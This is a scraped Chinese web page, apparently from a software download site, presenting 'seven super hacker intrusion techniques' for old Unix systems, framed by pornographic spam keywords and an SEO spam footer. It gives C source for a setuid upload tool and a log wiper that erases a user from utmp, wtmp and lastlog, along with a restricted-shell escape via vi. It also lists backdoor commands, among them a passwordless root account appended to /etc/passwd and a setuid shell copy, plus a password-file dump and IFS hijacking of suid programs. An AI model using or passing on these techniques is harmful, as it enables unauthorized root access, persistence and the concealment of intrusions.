人人做人人澡人人爽欧美,国产主播一区二区,久久久精品五月天,羞羞视频在线观看免费

當前位置:蘿卜系統 > 網絡技術教程 > 詳細頁面

黑客入侵超級技巧7則

黑客入侵超級技巧7則

更新時間:2019-01-26 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。
1 、UPLOAD

侵入成功后,拿到root權限了,這個東東可以把他的服務器的訪問權限改了,讓任何人都可以上傳文件 !
root 狀 態 下, 運 行 Install 后,
upload 將 允 許 普 通 用 戶 上 載 文 件 至 任 何 目 錄 下。
# chmod 755 install
#./install
$ more install
#! /bin/csh -f
cc upload.c
cp a.out upload
chown root upload
chmod 755 upload
chmod u+s upload
$ more upload.c
#include
main()
{
char filename[48];
printf( "This program will upload up.txt ASCII file to specified file\n" );
printf( "XXX Copyright Reserved\n" );
printf( "Where to upload (include path and filename)? " );
gets( filename );
upload( filename );
}
int upload( filename )
char *filename;
{
FILE *fp,*outp;
char c;
fp=fopen( "up.txt","r" );
outp=fopen( filename,"w" );
if( fp== NULL ) {
printf( "file not exist." );
return 0;
}
for( ;; ) {
c= fgetc( fp );
if feof( fp ) break;
printf( "%c",c );
fputc( c, outp );
}
fclose( fp );
fclose( outp );
return 1;
}

 
2、破壞現場

進入系統后,出來以前怎么破壞現場?抹掉自己的腳印?

編輯 /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.
請使用專門的編輯器

例子:

#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}

[page_break]3、突破SHELL

許多攻擊系統的方法都需要攻擊者首先有一個命令行式的Shell,如 /bin/csh 。但有些系統提供給用戶的卻是菜單式的定制Shell,如 pink 。所以如果你想攻擊這個系統的話,首先必須要沖破這個定制shell。
我們可以利用 vi (UNIX中標準的編輯器) 的一些命令來達到這個目的。具體過程如下:
(1).在定制Shell中選擇編輯文件,這時系統啟動 vi。
(2).在 vi 中,輸入以下命令序列:(注意:輸入的命令包括最前面的 ':' )
:set shell=/bin/csh
:shell
3.這時,就像在DOS程序的File菜單中選擇Dos Shell菜單項一樣,系統啟動一個Shell,而這個Shell剛剛被我們設定成 /bin/csh,因此我們就得到了一個命令行式的Unix Shell。

 

4、后門


進入一個系統以后隨手留下一個后門確實是很好的習慣:) 這里介紹幾種簡單的后門設置方法:
(1). setuid
#cp /bin/sh /tmp/.backdoor
#chmod u+s /tmp/.backdoor
加上 suid 位到shell 上,最為簡單方便.
(2). echo "wyj::0:0::/:/bin/csh" >> /etc/passwd
即給系統增加一個 id 為 0(root)的帳號,無口令.
(3). echo "+ wyj">>/.rhosts
即本地的名為wyj的用戶可以直接 rlogin target 無須口令此時的wyj就相當于口令,不知道的人是不能進去的.前提是目標的port 512or513or514 opening.

 

5、用telnet上傳文件


如果ftp被關了,sendmail也不行,如何把編譯好的文件上傳到主機呢?
方法很簡單:
1.先把要上傳的文件用uuedcode進行編碼,文件會變成大概下面的樣子:
begin 644 file.bat
M.C!J95@T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT4%]J
M95@T85!9+7@M04%28#!@*CTP,'500D])04%!049+04]"4$E$34-"04Q%04I-
M3D-"2D%,24%!14U-3D-"1D5'24=&0T%%3D="1T1(0T=02$='2DA#2$9(1$-!
M1TI(1$-!1T1'4$=.1TI'3T=(0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@
M"D!%0TA/($]&1B`*0T]062`E,"Y"050@+T(@0SI<0D%45DE2+D-/32`O0B`O
E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@``
`
end
sum -r/size 17903/262
全部都是可見的ASCII字符了
2.用TELNET連接到主機后輸入
$ cat >a
然后用WINODWS的拷貝/粘貼,把文件粘貼到telnet窗口
按^d
在當前目錄下產生文件a
3.uudecode a
文件復原,然后chmod即可

 

6、破解Shadow

很多系統下寫一個小程序不停的調用getpwent() 函數便能得到沒有shadow過的密碼檔
#include
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}

 
7、從suid腳本或程序中得到root

(1).如果該程序中有包含一個類似下面的數據:
system("/bin/date")
這時你可以把自己的IFS改為'/':
IFS='/';export IFS # Bourne Shell
setenv IFS '/' # C Shell
export IFS='/' # Korn Shell

這時你只要有一個你自己的軟件路徑調用了"bin",suid程序就會運行你的程序,并代替/bin/date


網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

網站地圖xml | 網站地圖html
主站蜘蛛池模板: 库伦旗| 丰原市| 十堰市| 兴城市| 舒城县| 靖安县| 乌兰察布市| 和静县| 深圳市| 福清市| 江山市| 新乡县| 新疆| 吉木萨尔县| 涿州市| 绥宁县| 二连浩特市| 扬州市| 娄底市| 朝阳县| 新巴尔虎左旗| 龙胜| 南澳县| 徐水县| 普兰店市| 桃园县| 定日县| 长顺县| 乾安县| 涞源县| 清水河县| 名山县| 上犹县| 涿州市| 虞城县| 马边| 睢宁县| 库伦旗| 连南| 海兴县| 合水县|